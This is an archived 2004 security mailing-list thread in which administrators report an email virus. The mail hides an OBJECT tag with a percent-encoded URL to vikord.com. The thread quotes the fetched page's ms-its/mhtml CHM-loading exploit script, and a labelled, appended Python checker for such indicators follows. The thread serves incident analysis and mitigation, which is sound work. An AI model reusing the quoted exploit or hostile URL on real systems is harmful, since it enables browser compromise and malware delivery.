Network Security Focus-Virus
RE: Virus from vikord.com?

Subject: RE: Virus from vikord.com?
Date: Fri, 27 Aug 2004 17:12:37 -0400
I'm glad someone else saw this. I have had two instances of this today
and noticed that the ".gif" file contained 45451212. I had one e-mail
with the subject of "1" and one with the subject of "2". Both contained
the attachment "1.gif." I also received the active x notification and
did not pursue it further to realize there was a hidden url embedded in
the message. After receiving your alert I looked deeper and found the
same url listed.

Something's going around.

Thanks,
Mike


Michael Fredericks
Network Administrator
Nautic Partners, LLC

-----Original Message-----
From: Mason, Samuel [mailto:smason@state.mt.us] 
Sent: Friday, August 27, 2004 2:05 PM
To: focus-virus@securityfocus.com
Subject: Virus from vikord.com?

Hello all,

I'd like to see who else has run into this problem. 

We had a user receive a mail from what was supposed to be another State
employee. The email had a GIF attachment (2.gif) with the subject line
of "2".

The GIF file was invalid and only contained the characters "45451212"

The HTML in the message included this:

<OBJECT data=http://www.v%69k%6F%72d.com/default.htm>

which resolved to www.vikord.com.default.htm. The site is down with a
"Service Temporarily Unavailable" message due to maintenance or capacity
problems. 

I Googled for an answer and got a little info that included this:


Quick snag with wget:

wget http://www.v%69k%6F%72d.com/default.htm
--14:26:50--  http://www.vikord.com/default.htm
           => `default.htm'
Resolving www.vikord.com... 194.226.217.167
Connecting to www.vikord.com[194.226.217.167]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

    [ <=>                                           ] 350           --.--K/s

14:26:56 (3.34 MB/s) - `default.htm' saved [350]

username@coroner ~ $ cat default.htm
<textarea id="code" style="display:none;">
    <object data="&#109;s-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.chm::/default.htm" type="text/x-scriptlet"></object>
</textarea>

<script language="javascript">
document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,location.href.indexOf('default.htm'))));
</script>

Which seems to indicate the original intent was to download a CHM file,
correct?

I'd like to know if someone else has seen this. Is this a known virus or
something that I just could not find info for? The website is down, which
is good, but how can we mitigate this on a more permanent basis? Our
workstations indicated that the ActiveX control could not run and the
page would not display properly but I am concerned that users may have
lower security settings somewhere in the enterprise.

Thanks for any help.


Samuel Mason, CISSP
OCP, Information Technology Services Division
State of Montana
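A small mail-gateway style checker, added here as an example and not part of the thread, for the indicators Samuel describes: it decodes the percent-encoded hostname in the <OBJECT data=...> tag, flags object URLs that route through a local protocol handler such as ms-its:, and verifies that a ".gif" attachment actually carries a GIF header. The sample HTML and attachment bytes are constructed from the thread's description, not a real capture.

```python
import html
import re
from urllib.parse import unquote, urlsplit

# Constructed sample modelled on the mail described in the thread (not a real
# capture): an <OBJECT> whose hostname is percent-encoded, and a "GIF"
# attachment that is really eight ASCII digits.
SAMPLE_HTML = '<OBJECT data=http://www.v%69k%6F%72d.com/default.htm></OBJECT>'
SAMPLE_ATTACHMENTS = {"2.gif": b"45451212"}

OBJECT_DATA = re.compile(r'<object\b[^>]*?\bdata\s*=\s*["\']?([^\s"\'>]+)', re.I)
# Schemes that hand the fetch to a local protocol handler instead of plain HTTP.
LOCAL_HANDLER_SCHEMES = {"ms-its", "its", "mk", "mhtml"}
GIF_MAGIC = (b"GIF87a", b"GIF89a")

def decode_obfuscated_url(raw):
    """Undo HTML entities and repeated percent-encoding to expose the real target."""
    url = html.unescape(raw)
    for _ in range(3):  # bounded: stop when another pass changes nothing
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return url

def extract_object_urls(page):
    """Return (raw, decoded) pairs for every <object data=...> in the HTML."""
    return [(m, decode_obfuscated_url(m)) for m in OBJECT_DATA.findall(page)]

def is_valid_gif(data):
    """A real GIF begins with GIF87a or GIF89a; anything else is mislabelled."""
    return data[:6] in GIF_MAGIC

def assess_message(page, attachments):
    """Findings for one HTML mail body and its {filename: bytes} attachments."""
    findings = []
    for raw, decoded in extract_object_urls(page):
        if raw.lower() != decoded.lower():
            findings.append(f"obfuscated object URL {raw!r} decodes to {decoded!r}")
        scheme = urlsplit(decoded).scheme.lower()
        if scheme in LOCAL_HANDLER_SCHEMES:
            findings.append(f"object routed through local handler {scheme!r}: {decoded!r}")
    for name, data in attachments.items():
        if name.lower().endswith(".gif") and not is_valid_gif(data):
            findings.append(f"attachment {name!r} is named .gif but has no GIF header")
    return findings

if __name__ == "__main__":
    for finding in assess_message(SAMPLE_HTML, SAMPLE_ATTACHMENTS):
        print(finding)
```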
 


